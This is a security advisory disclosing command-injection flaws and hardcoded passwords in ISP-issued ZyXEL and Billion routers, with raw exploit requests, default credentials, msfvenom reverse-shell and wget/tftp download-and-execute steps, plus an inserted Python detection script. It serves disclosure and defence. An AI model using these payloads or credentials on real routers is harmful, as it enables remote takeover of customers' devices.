SSD Advisory – ZyXEL / Billion Multiple Vulnerabilities

Vulnerability Summary
The following advisory describes four (4) vulnerabilities and default accounts / passwords in ZyXEL / Billion customized routers.
TrueOnline is a major Internet Service Provider in Thailand that provides customized versions of routers to its customers, free of charge.
The routers are manufactured by ZyXEL and Billion and run a special Linux distribution called “tclinux”. Several models are distributed by TrueOnline; three in particular are widespread:

  1. ZyXEL P660HN-T v1 (distributed up to 2013)
  2. ZyXEL P660HN-T v2
  3. Billion 5200W-T (currently being distributed to new clients)

These are customized versions of existing ZyXEL and Billion routers. They are MIPS systems and all run the BOA web server. The routers are vulnerable to command injection in their web interface, which can be exploited by an unauthenticated as well as an authenticated attacker. Furthermore, the routers include several hardcoded accounts besides the usual administrator account.
The four vulnerabilities found in ZyXEL / Billion routers:

  1. Unauthenticated remote command execution vulnerability – P660HN-T v1 router
  2. Unauthenticated remote command execution vulnerability – Billion 5200W-T
  3. Authenticated remote command execution vulnerability – Billion 5200W-T
  4. Unauthenticated remote command execution vulnerability – P660HN-T v2

Default accounts and passwords:

  1. Default accounts – P660HN-T v1 router
  2. Default accounts – P660HN-T v2
  3. Default accounts – Billion 5200W-T router

Credit
Pedro Ribeiro (pedrib@gmail.com) has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Unauthenticated remote command execution vulnerability – P660HN-T v1 router
The P660HN-T v1 router has a command injection vulnerability in Maintenance > Logs > System Log > Remote System Log, in the “Remote host” field:
Remote host: ;command;#
The vulnerability can be found in the ViewLog.asp page, which is accessible unauthenticated.

POST /cgi-bin/ViewLog.asp HTTP/1.1
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save

The command injection is in the remote_host parameter:

remote_host=%3bping+-c+3+10.0.99.102%3b%23

Proof of Concept
To perform the attack, the following MSF command line should be used:

msfvenom -p linux/mipsbe/shell_reverse_tcp -f elf -o /tmp/shell-be.bin lhost=192.168.1.35 lport=4444

The /tmp directory is then served through the tftp service.
This should be followed by downloading and executing the shell by injecting the following command:

cd tmp; tftp -g -r shell.bin 10.13.37.1; chmod +x /tmp/shell.bin; /tmp/shell.bin

Default accounts – P660HN-T v1 router

  1. username: admin; password: password
  2. username: true; password: true

Unauthenticated remote command execution vulnerability – Billion 5200W-T
There’s an unauthenticated command injection in the adv_remotelog.asp file:

POST /cgi-bin/adv_remotelog.asp HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514

The injection is in the syslogServerAddr parameter, which can be exploited by entering a valid IP address followed by “;<COMMAND>;”.
Proof of Concept
Same as the previously mentioned unauthenticated remote command execution vulnerability in the P660HN-T v1; the only difference is the target device.
Authenticated command execution vulnerability – Billion 5200W-T
The Billion 5200W-T has an authenticated command injection in its tools_time.asp page, via the uiViewSNTPServer parameter:

POST /cgi-bin/tools_time.asp HTTP/1.1
Host: 127.0.0.1:10080
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Cookie: SESSIONID=7c082c75
Content-Length: ...
SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0
&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29
&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=
&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+127.0.0.1+%26%23
&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA

This request writes the supplied text, including the injected command, to a file named /etc/ntp.sh:

/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 127.0.0.1 &#" &

The file is then executed.
Default accounts – Billion 5200W-T router

  1. username: admin; password: password
  2. username: true; password: true
  3. username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678

Unauthenticated command execution vulnerability – P660HN-T v2
The remote command execution vulnerability is composed of an authenticated command injection and a hardcoded supervisor password. The command injection vulnerability is in the logSet.asp file, and the hardcoded supervisor account is – username: supervisor; password: zyad1234.

POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1
Content-Length: ...
logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&serverPort=514

This will be written to /etc/syslog.conf file as:

ServerIP="192.168.1.1 `ping -c 3 1.1.1.1`&#"

This is then executed by the syslog background process.
The injection parameter is ServerIP:

ServerIP=1.1.1.1`<command />`&#

The actual command that can be injected has a length limitation of 28 characters.
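The four injection points above share one pattern: a hostname or IP field is written unsanitized into a shell-executed file. The following detection script is an added example, not part of the advisory, that flags HTTP request bodies carrying shell metacharacters in those parameters; the endpoint and parameter names are taken from the advisory, the sample requests are constructed for the demonstration.

```python
# Added example (not part of the advisory): flag POST bodies aimed at the four
# injection points described in this advisory. Endpoint/parameter names are
# from the advisory; the sample traffic below is constructed.
import re
from urllib.parse import parse_qs

# endpoint -> parameter whose value reaches a shell unsanitized (per advisory)
VULNERABLE_PARAMS = {
    "/cgi-bin/ViewLog.asp": "remote_host",
    "/cgi-bin/adv_remotelog.asp": "syslogServerAddr",
    "/cgi-bin/tools_time.asp": "uiViewSNTPServer",
    "/cgi-bin/pages/maintenance/logSetting/logSet.asp": "serverIP",
}

# Shell metacharacters used in the advisory's payloads (; ` & # and quotes),
# plus a few others that would never appear in a legitimate host value.
SHELL_META = re.compile(r"[;`&#\"'|$]")

# A legitimate value for these fields is a hostname or IPv4 address (or empty).
HOST_OK = re.compile(r"^[A-Za-z0-9.\-]{0,253}$")


def check_request(path, body):
    """Return (parameter, decoded value) when the vulnerable parameter for
    this path carries shell metacharacters or is not host-shaped, else None."""
    param = VULNERABLE_PARAMS.get(path)
    if param is None:
        return None
    # parse_qs percent-decodes and turns '+' into spaces, as the CGI would.
    for value in parse_qs(body, keep_blank_values=True).get(param, []):
        if SHELL_META.search(value) or not HOST_OK.match(value):
            return (param, value)
    return None


# Constructed sample traffic: the first two mirror the advisory's requests,
# the third is a benign remote-syslog configuration change.
SAMPLE_REQUESTS = [
    ("/cgi-bin/ViewLog.asp",
     "remote_submit_Flag=1&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save"),
    ("/cgi-bin/pages/maintenance/logSetting/logSet.asp",
     "active=1&serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&serverPort=514"),
    ("/cgi-bin/adv_remotelog.asp",
     "RemotelogEnable=1&syslogServerAddr=192.168.1.50&serverPort=514"),
]


def scan(requests):
    """Return [(path, (param, value)), ...] for every suspicious request."""
    hits = []
    for path, body in requests:
        hit = check_request(path, body)
        if hit:
            hits.append((path, hit))
    return hits


if __name__ == "__main__":
    for path, (param, value) in scan(SAMPLE_REQUESTS):
        print(f"ALERT {path} {param}={value!r}")
```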
Proof of Concept
To perform the attack, the following MSF command line should be used:

msfvenom -p linux/mipsbe/shell_reverse_tcp -f elf -o /tmp/shell-be.bin lhost=192.168.1.35 lport=4444

The /tmp directory is then served through the tftp service.
Authenticate to the interface with supervisor:zyad1234.
Write the following file to /tmp/a by performing several injections (the injection accepts only 10 and 13 characters at a time).

#!/bin/sh
wget -q -O /tmp/b http://10.13.37.1/b
chmod +x /tmp/b
/tmp/b

Then inject the following commands:

chmod +x /tmp/a
/tmp/a

Default accounts – P660HN-T v2 router

  1. username: admin; password: password
  2. username: true; password: true
  3. username: supervisor; password: zyad1234

Vendor Response
We notified ZyXEL of the vulnerabilities back in July 2016; repeated attempts to re-establish contact and get an answer on the status of the patches for these vulnerabilities went unanswered. At this time there is no solution or workaround for these vulnerabilities.
Edit: In January 2017, ZyXEL contacted us and corrected us: they are not the manufacturer of the Billion routers.